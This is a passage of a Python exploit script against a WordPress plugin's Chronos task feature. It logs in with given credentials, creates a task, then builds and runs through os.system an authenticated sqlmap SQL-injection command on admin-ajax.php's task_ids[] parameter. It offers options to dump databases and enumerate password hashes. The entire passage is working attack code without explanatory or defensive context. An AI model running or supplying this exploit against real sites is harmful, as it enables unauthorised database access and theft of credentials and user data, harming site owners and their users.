my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Create task to ensure duplicate:
dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2'
# Header:
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://" + target_ip,
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1"
}
# Body
body = {
"rmc-task-edit-form-subbed": "yes",
"rm-task-slide": "on",
"rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)),
"rmc_task_description": "fiasfdhb",
"rmc_rule_sub_time_older_than_age": '',
"rmc_rule_sub_time_younger_than_age": '',
"rmc_rule_fv_fids[]": '',
"rmc_rule_fv_fvals[]": '',
"rmc_rule_pay_status[]": "pending",
"rmc_rule_pay_status[]": "canceled",
"rmc_action_user_acc": "do_nothing",
"rmc_action_send_mail_sub": '',
"rmc_action_send_mail_body": ''
}
# Create project
a = session.post(dupl_url, headers=header, data=body)
# SQL-Injection (Exploit):
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"'
exploitcode_cookie = ' --cookie="' + cookie + '"'
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))